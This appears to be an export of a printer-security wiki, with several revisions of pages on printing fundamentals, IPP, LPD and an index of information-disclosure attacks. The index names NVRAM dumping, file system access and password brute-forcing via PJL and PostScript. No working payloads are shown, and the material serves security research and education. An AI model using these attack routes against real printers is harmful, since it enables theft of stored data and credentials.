[https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. → ''Related aricles:'' [[PCL]], [[PostScript]] ----------- 9be45f3eebf8d9b123a358989eff7f7f21f3f0d8 62 60 2017-01-07T19:02:58Z Admin 1 wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in small businesses. The printing hardware is not addressed in detail in this wiki, as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|border|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface through the network. == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its metalanguage [[PML]] as introduced in the following. == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. % specifies the actual document to be rendered | structure | layout % and then to explicitly communicate to the printer device which language is going to be used. % explicitly set the PDL first % however it is embedded within a printing protocol. % Therefore, PJL can also be refered to as a printer control languages. % PJL is not limited to the current % In comparison, a printer control and management languages affects not only a single job but the printer device as a whole. %In this work the terms %job control language and printer control lanuage can usually be used as synonyms as there is no %It must be pointed job control languages that there is no clear %\textit{... many more\\ %... have interesting features like file system access\\ %... often proprietary, vendor-specific\\ %... might be worth a look} 62b7773f97af12d10002cf1901660c6a688c3840 60 2017-01-07T18:46:58Z Admin 1 Created page with "Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.w..." wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in small businesses. The printing hardware is not addressed in detail in this wiki, as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == A schematic relationship of the subjects discussed in this chapter is given below: The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in IPP, PJL and PostScript. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this work, our focus is mainly on printer languages, particularly PJL and PostScript. [[File:Protocols.png|framed|Encapsulation of printer languages]] == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface through the network. == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its metalanguage [[PML]] as introduced in the following. == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. 779a4e45adab26ee398252062029724288828283 0 26 311 263 2017-01-31T08:27:31Z 84.153.135.37 0 wikitext text/x-wiki [[File:IPP-deployment-channel.png|thumb|180px|Printing over IPP]] Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is ''CUPS'' <ref>''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet</ref>, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs. Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is no further exploited except for [[Accounting bypass|accounting bypasses]]. → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] <!-- , printer language discovery and cross-site printing attacks. --> ---- e235716ca0e23d19f63814fd3699533c157076fd 263 257 2017-01-28T14:47:38Z Admin 1 wikitext text/x-wiki [[File:IPP-deployment-channel.png|thumb|180px|Printing over IPP]] Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is ''CUPS'' <ref>''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet</ref>, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs. Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is no further exploited except for [[Accounting bypass|accounting bypasses]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] <!-- , printer language discovery and cross-site printing attacks. --> ---- 99b5c66c76bf9553c7281aa47650b5a5917e28c1 257 250 2017-01-28T14:42:56Z Admin 1 wikitext text/x-wiki [[File:IPP-deployment-channel.png|thumb|180px|IPP print job deployment]] Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is ''CUPS'' <ref>''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet</ref>, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs. Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is no further exploited except for [[Accounting bypass|accounting bypasses]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] <!-- , printer language discovery and cross-site printing attacks. --> ---- 3541de91a4150f2ff020e3412824dcfa2a8c6344 250 245 2017-01-28T14:18:20Z Admin 1 wikitext text/x-wiki [[File:IPP-deployment-channel.png|thumb|Deployment of (malicious) print jobs via IPP]] Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is ''CUPS'' <ref>''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet</ref>, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs. Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is no further exploited except for [[Accounting bypass|accounting bypasses]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] <!-- , printer language discovery and cross-site printing attacks. --> ---- 11d492c18c5c36765232e5de9b71c39108637799 245 127 2017-01-28T14:16:15Z Admin 1 wikitext text/x-wiki [[File:IPP-deployment-channel.png|thumb|Deployment of (malicious) print jobs via IPPl]] Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is ''CUPS'' <ref>''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet</ref>, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs. Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is no further exploited except for [[Accounting bypass|accounting bypasses]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] <!-- , printer language discovery and cross-site printing attacks. --> ---- 6ad7286152f47476f873d28dfdace4ff45bd7f63 127 83 2017-01-14T19:57:41Z Admin 1 wikitext text/x-wiki Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is ''CUPS'' <ref>''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet</ref>, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs. Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is no further exploited except for [[Accounting bypass|accounting bypasses]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] <!-- , printer language discovery and cross-site printing attacks. --> ---- a5700d8a38f3e3c4285ae320ceee79ed1c7694d6 83 78 2017-01-09T09:50:05Z Admin 1 wikitext text/x-wiki Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is ''CUPS'' <ref>''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet</ref>, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs. Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is no further exploited except for [[Accounting bypass|accounting bypasses]]. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] <!-- , printer language discovery and cross-site printing attacks. --> ---- 1e0c2f5b96081e9c49ae7041a00723667bf22a59 78 2017-01-09T09:34:12Z Admin 1 Created page with "Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet..." wikitext text/x-wiki Between 1999 and 2005 the IETF IPP working group published various draft standards for an LPD successor capable of authentication and print job queue management. The Internet Printing Protocol (IPP) is defined in RFC2910 <ref>''[https://www.ietf.org/rfc/rfc2910.txt RFC2910: Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> and RFC2911 <ref>''[https://www.ietf.org/rfc/rfc2911.txt RFC2911: Internet Printing Protocol/1.1: Model and Semantics]'', T. Hastings and others, 2000</ref>. IPP is an extendable protocol, for example ‘IPP Everywhere’ as specified in <ref>''[http://www.pwg.org/candidates/cs-ippeve10-20130128-5100.14.pdf IPP Everywhere]'', PWG, The Printer Working Group, 2013</ref> is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing <ref>''[http://ftp.pwg.org/pub/pwg/ipp/wd/wd-ipp3d10-20160824.pdf IPP 3D Printing Extensions (3D)]'', PWG, The Printer Working Group, 2016</ref> have been released. Because IPP is based on HTTP, it inherits all existing security features like [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication and [https://en.wikipedia.org/wiki/Transport_Layer_Security SSL/TLS] encryption. To submit a print job or to retrieve status information from the printer, an HTTP ''POST'' request is sent to the IPP server listening on port 631/tcp. A famous open-source IPP implementation is ''CUPS'' <ref>''[http://www.cups.org/ Common Unix Printing System]'', M. Sweet</ref>, which is the default printing system in many Linux distributions and OS X. Network printers usually run their own IPP server as one method to accept print jobs. Similar to [[LPD]], IPP is a '''channel''' to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files. In this wiki, IPP itself is no further exploited except for [[Accounting bypass|accounting bypasses]]. → ''Related aricles:'' [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] <!-- , printer language discovery and cross-site printing attacks. --> ---- 5fca18d31590496cde4cffc951cc37ccb76bc148 0 38 159 158 2017-01-15T17:17:24Z 92.227.58.56 0 wikitext text/x-wiki Apart from print jobs, printers may contain further potentially sensitive information like passwords – not only for the device itself but sometimes even to the surrounding network environment. ''Currently, the following information disclosure categories are discussed in this wiki:'' * [[Memory access]] – Dumping the printer's NVRAM using proprietary PJL commands * [[File system access]] – Performing file system operations using PostScript and PJL * [[Credential disclosure]] – Obtaining PJL and PostScript passwords by brute-force attacks 2ecea7e901e3e9e76b1bbf29f9a5f2a0067ee0f6 158 151 2017-01-15T17:15:59Z 92.227.58.56 0 wikitext text/x-wiki Apart from print jobs, printers may contain further potentially sensitive information like passwords – not only for the device itself but sometimes even to the network environment. ''Currently, the following information disclosure categories are discussed in this wiki:'' * [[Memory access]] – Dumping the printer's NVRAM using proprietary PJL commands * [[File system access]] – Performing file system operations using PostScript and PJL * [[Credential disclosure]] – Obtaining PJL and PostScript passwords by brute-force attacks e89ecf9ee4f46094a52eba15c5e38663311a4bd9 151 147 2017-01-15T16:36:21Z 92.227.58.56 0 wikitext text/x-wiki ''Currently, the following information disclosure categories are discussed in this wiki:'' * [[Memory access]] – Dumping the printer's NVRAM using proprietary PJL commands * [[File system access]] – Performing file system operations using PostScript and PJL * [[Credential disclosure]] – Obtaining PJL and PostScript passwords by brute-force attacks 6582e6c911cc04b87ef267ca7881bc8ea84a865a 147 2017-01-15T16:28:41Z 92.227.58.56 0 Created page with "''Currently, the following denial of service techniques are discussed in this wiki:'' * [[Memory access]] – Dumping the printer's NVRAM using proprietary PJL commands * F..." wikitext text/x-wiki ''Currently, the following denial of service techniques are discussed in this wiki:'' * [[Memory access]] – Dumping the printer's NVRAM using proprietary PJL commands * [[File system access]] – Performing file system operations using PostScript and PJL * [[Credential disclosure]] – Obtaining PJL and PostScript passwords by brute-force attacks 49b1b70003c7388f97a3594f0b45f392fcfea503 0 25 314 313 2017-01-31T08:32:36Z 84.153.135.37 0 wikitext text/x-wiki [[File:LPD-deployment-channel.png|thumb|180px|Printing over LPD]] The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 80s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control file''' defining job/username and a '''data file''' containing the actual data to be printed. The input type of the data file can be set in the control file by choosing among various file formats. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is ''LPRng'' <ref>''[http://lprng.sourceforge.net/ LPRng – An Enhanced Printer Spooler]'', P. Powell</ref>. LPD can be used as a carrier to deploy malicious PostScript or PJL print jobs. The protocol itself is not further analyzed in this wiki, with the exception of [[Accounting bypass|accounting bypasses]] and a fuzzer written to discover [[Buffer overflows#LPD daemon|buffer overflows]] in LPD implementations. The ''lpdprint'' tool included in [[PRET]] is a minimalist way to print data directly to an LPD capable printer as shown below: lpdprint.py hostname filename → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Accounting bypass]], [[Buffer overflows]] ---- 0f6dc281d306f7d119582c04d736cdcbb289f15f 313 262 2017-01-31T08:30:59Z 84.153.135.37 0 wikitext text/x-wiki [[File:LPD-deployment-channel.png|thumb|180px|Printing over LPD]] The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 1980s. The existing implementation was later specified by RFC1179 <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref>. The daemon runs on port 515/tcp and can be accessed using the ‘lpr’ command. While the LPD process was traditionally hosted on a computer system connected to the printing device, today's network printers run their own daemon directly accessible over the network. To print, the client sends a '''control 